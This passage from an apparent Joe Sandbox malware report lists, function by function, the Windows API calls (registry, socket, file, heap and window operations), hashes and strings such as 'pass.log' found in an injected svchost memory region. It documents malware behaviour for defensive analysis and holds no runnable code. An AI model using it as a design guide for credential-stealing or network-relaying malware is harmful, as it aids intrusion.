                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F8A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F9F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 92f35f97a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2510291871-3066206799
                                                                                                                                                                                                            • Opcode ID: c9896e355f72d0ac8f78d9d656b9a9fcbb5e46da394b6be2b37a54d38e5b89ec
                                                                                                                                                                                                            • Instruction ID: 965a6c0805f5aa3b88c0bc7b017f05e06a6b41355062923ce301ca052dc6195e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9896e355f72d0ac8f78d9d656b9a9fcbb5e46da394b6be2b37a54d38e5b89ec
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF11C471A40188ABEB24DBA4DCC8FEE776DEB54308F204AADF646D7440D271DE84CB90
                                                                                                                                                                                                            Function 02C883B0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 02C883CB
                                                                                                                                                                                                            • shutdown.WS2_32(02C884AC,00000001), ref: 02C883D0
                                                                                                                                                                                                            • recv.WS2_32(02C884AC,?,00000400,00000000), ref: 02C883EF
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 02C88405
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 02C88419
                                                                                                                                                                                                            • closesocket.WS2_32(02C884AC), ref: 02C8841C
                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 02C88420
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1638183600-0
                                                                                                                                                                                                            • Opcode ID: db002666e193d67a4fa707397537c28dadfaec4b9e9a6e682c755636d7f6cf5f
                                                                                                                                                                                                            • Instruction ID: 050308a56ae31777cf988864614140b0bd900212560c140347662cfed291bd14
                                                                                                                                                                                                            • Opcode Fuzzy Hash: db002666e193d67a4fa707397537c28dadfaec4b9e9a6e682c755636d7f6cf5f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85F031B29503187BD720AA65CC85F9B3B6CAB88B94F004644BB09BB180D6B4F941CEE4
                                                                                                                                                                                                            Function 02C89130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorysynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8915E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 819421891-465009422
                                                                                                                                                                                                            • Opcode ID: bf17576b4b3f9974584de17eb10b964acc128a6fc0dcc4f49bd0e869d17f9889
                                                                                                                                                                                                            • Instruction ID: e6f4492e7aabcac417ad51598b3df8eae1fa1d9cfa0e8139636ceb90c3e03de5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf17576b4b3f9974584de17eb10b964acc128a6fc0dcc4f49bd0e869d17f9889
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E01F3B0E81B11AFC32ACF28E844B46FBF4BF48710F048A5AE55A87780D730B950CB90
                                                                                                                                                                                                            Function 02C9C97A Relevance: 9.1, APIs: 6, Instructions: 141fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • free.MSVCRT ref: 02C9C81F
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 02C9CA0D
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C9CA51
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C9CAC3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$AttributesCreateDirectoryMovefree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1026147201-0
                                                                                                                                                                                                            • Opcode ID: 6d56f136752f8de2cf715215aaabbe1badd567b4ca862488b421c707f727fe41
                                                                                                                                                                                                            • Instruction ID: 6fbb9ba311c2d486b087baf120766f527d6bb41bf08a3a80a0ff45588bae05d7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d56f136752f8de2cf715215aaabbe1badd567b4ca862488b421c707f727fe41
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4413831A4429A8FDF21CF7888987F97FA49F9A344F1445EAE582CB245DB309705CBA1
                                                                                                                                                                                                            Function 02C880E0 Relevance: 9.1, APIs: 6, Instructions: 106networkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 02C8810E
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8813F
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8816B
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C88192
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C881B4
                                                                                                                                                                                                            • WSASetLastError.WS2_32(?), ref: 02C881DE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$Read
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2835504744-0
                                                                                                                                                                                                            • Opcode ID: c5fd1cbb214b15cdab6ce06d29a125c76e6a7ede30152256b383716933324556
                                                                                                                                                                                                            • Instruction ID: e7fe724f489af6321f71dceae56ef92282b7923a0bf88af3b1335e520fe97cb7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5fd1cbb214b15cdab6ce06d29a125c76e6a7ede30152256b383716933324556
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F41CAB1E0020DAFDB40DFA9D985AAEBBF9EF48304F518569E905E7200E7749A41CF90
                                                                                                                                                                                                            Function 02C9F1E0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C9F540: htons.WS2_32(?), ref: 02C9F564
                                                                                                                                                                                                              • Part of subcall function 02C9F540: inet_addr.WS2_32(?), ref: 02C9F56F
                                                                                                                                                                                                              • Part of subcall function 02C9F540: htonl.WS2_32(000000FF), ref: 02C9F57A
                                                                                                                                                                                                              • Part of subcall function 02C9F540: gethostbyname.WS2_32(?), ref: 02C9F586
                                                                                                                                                                                                              • Part of subcall function 02C9F540: socket.WS2_32(00000002,00000001,00000000), ref: 02C9F5A0
                                                                                                                                                                                                              • Part of subcall function 02C9F540: connect.WS2_32(00000000,?,00000010), ref: 02C9F5B3
                                                                                                                                                                                                              • Part of subcall function 02C9F540: closesocket.WS2_32(00000000), ref: 02C9F5BE
                                                                                                                                                                                                            • setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9F21F
                                                                                                                                                                                                            • closesocket.WS2_32 ref: 02C9F234
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocket$connectgethostbynamehtonlhtonsinet_addrsetsockoptsocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2706992148-0
                                                                                                                                                                                                            • Opcode ID: 53adfa6ea3cf7b33249b95afa0770064adb70ff08dbdb1e7d2fb769282cd73ba
                                                                                                                                                                                                            • Instruction ID: cc431ba2af91e8e9b9009b5b2c384af590350d5debc5c8f42bee17bc6d3df787
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53adfa6ea3cf7b33249b95afa0770064adb70ff08dbdb1e7d2fb769282cd73ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A310A75A40615BBDB10CFA8E84DBEAB7A8FF05710F20825AF515C7180EB719A54CBE1
                                                                                                                                                                                                            Function 02C79030 Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 02C79057
                                                                                                                                                                                                            • IsRectEmpty.USER32(?), ref: 02C790C6
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
                                                                                                                                                                                                            • GetParent.USER32(?), ref: 02C790EA
                                                                                                                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Rect$EmptyLongParentPoints
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 379166938-0
                                                                                                                                                                                                            • Opcode ID: 374e363667ad26d19e2a5c50ec631439f3f6d0eb4c8d02660777ea6d35d9f735
                                                                                                                                                                                                            • Instruction ID: 4e9a8a0b1bcc44802f0ea67f31edd1616058c903fd7bc8432f77e8a2b9c7038a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 374e363667ad26d19e2a5c50ec631439f3f6d0eb4c8d02660777ea6d35d9f735
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F313071E40219EFDB01CFA9D949AFEBBB8FF49710F104699E445A7240D7B09A10CBA1
                                                                                                                                                                                                            Function 02C72860 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexitfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3367576030-0
                                                                                                                                                                                                            • Opcode ID: 64cf0029b2f039a47c8f44471105e99cfb02d11d2272fc1700fe2650d6133c84
                                                                                                                                                                                                            • Instruction ID: 969ca29441430a44ae7d068f8bd1570233bf6ff43ec5cf71020b18c90718a8d7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64cf0029b2f039a47c8f44471105e99cfb02d11d2272fc1700fe2650d6133c84
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64213DB6A00359AFDB11CF58DC81BAB77A8FF88310F044569ED4597340D772EE108BA2
                                                                                                                                                                                                            Function 02C81AC0 Relevance: 9.1, APIs: 6, Instructions: 63memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
                                                                                                                                                                                                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
                                                                                                                                                                                                              • Part of subcall function 02C81330: memset.MSVCRT ref: 02C81347
                                                                                                                                                                                                              • Part of subcall function 02C81330: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7556F550,00000000), ref: 02C8135E
                                                                                                                                                                                                              • Part of subcall function 02C81330: PathAddBackslashA.SHLWAPI(?,?,7556F550,00000000), ref: 02C8136B
                                                                                                                                                                                                              • Part of subcall function 02C81330: PathFileExistsA.SHLWAPI(?,?,7556F550,00000000), ref: 02C813A7
                                                                                                                                                                                                              • Part of subcall function 02C81330: lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7556F550,00000000), ref: 02C813D1
                                                                                                                                                                                                              • Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02C813E0
                                                                                                                                                                                                              • Part of subcall function 02C81330: HeapValidate.KERNEL32(00000000,?,7556F550,00000000), ref: 02C813E3
                                                                                                                                                                                                              • Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02C813F0
                                                                                                                                                                                                              • Part of subcall function 02C81330: HeapFree.KERNEL32(00000000,?,7556F550,00000000), ref: 02C813F3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C81B4A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C81B5A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 649337724-0
                                                                                                                                                                                                            • Opcode ID: 1d786c4ce8f3e7b9c375caa0773c66e8652aa73733a14f89ed2191edea3b9b28
                                                                                                                                                                                                            • Instruction ID: 26e08be0b0e164c66fd54795b2ce944ec44a80d45b1e8e4f516e699ee8a2f7d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d786c4ce8f3e7b9c375caa0773c66e8652aa73733a14f89ed2191edea3b9b28
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9611C8B1E4425457DB206B349C18FF33BE89B91358F088A94E88C87180FBB0D95ACB60
                                                                                                                                                                                                            Function 02C89B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA380), ref: 02C89B47
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C89B85
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02C89BC9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                            • String ID: 6D1DA380$pass.log
                                                                                                                                                                                                            • API String ID: 2713433229-604133603
                                                                                                                                                                                                            • Opcode ID: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
                                                                                                                                                                                                            • Instruction ID: dd6b5d5ff430268dd9c764518b0ef113d75c22a133e28c216694d89d03cf3145
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 691127319046484BD7229B28A8A47F7BBE4EFC6301F14C6E4ECCAD7301EA30DA59C780
                                                                                                                                                                                                            Function 02C862E0 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C92F00: OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7742FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
                                                                                                                                                                                                              • Part of subcall function 02C92F00: GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
                                                                                                                                                                                                              • Part of subcall function 02C92F00: GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
                                                                                                                                                                                                              • Part of subcall function 02C92F00: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000,00000000,02C865A8), ref: 02C862F9
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86315
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05ACC1B8), ref: 02C8633A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8633D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05ACC1B8), ref: 02C8634A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8634D
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86358
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3901171168-0
                                                                                                                                                                                                            • Opcode ID: 26c6d85392eb8c4a16e942620162100858da66d781d82b7ac1ffba0ce0e35a5f
                                                                                                                                                                                                            • Instruction ID: e16848d6b56a16331ab7f53f00c9a1bda535184f7d0ec46107e6b32ba09f805d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26c6d85392eb8c4a16e942620162100858da66d781d82b7ac1ffba0ce0e35a5f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D01D832F44310A7DB217FA6F848B5A779CDFC4B56F244969E646C7240C7715414CBD0
                                                                                                                                                                                                            Function 02C9A8B0 Relevance: 7.7, APIs: 5, Instructions: 239COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02C9A909
                                                                                                                                                                                                              • Part of subcall function 02C9F0F0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9F1A0
                                                                                                                                                                                                              • Part of subcall function 02C9F0F0: closesocket.WS2_32(?), ref: 02C9F1BD
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02C9A915
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02C9A94D
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02C9A959
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02C9A9AC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: malloc$realloc$closesocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3133911991-0
                                                                                                                                                                                                            • Opcode ID: 0356a3c1231401b6a7be1d7f5de1c8159a5ac392767ba78456acf3909ac10746
                                                                                                                                                                                                            • Instruction ID: 234d781074eed9ee82bdb69a372c02d58ebd33085692b2bbe08d611481305c46
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0356a3c1231401b6a7be1d7f5de1c8159a5ac392767ba78456acf3909ac10746
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD91B471E006468FCF04CF69DD94BEA37A6FF84305F1985B9ED099B346D634AA11CBA0
                                                                                                                                                                                                            Function 02C83070 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C83079
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830AC
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830D8
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830FF
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C8317D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: fff302ee3b30c264ee0b45909c7ee0650ba2af0419d9d1cd90c9113fc6f59942
                                                                                                                                                                                                            • Instruction ID: c22fec3debad68109ae53af3713d6f3bc022abe314a829566c38cd502efa383c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fff302ee3b30c264ee0b45909c7ee0650ba2af0419d9d1cd90c9113fc6f59942
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C410070D002589FDB10DFA8DC84ABEBBF5EB49B14F14856AE854E7300D7749A41CF90
                                                                                                                                                                                                            Function 02C713C0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C713EE
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7142A
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C71456
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7147D
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C714A8
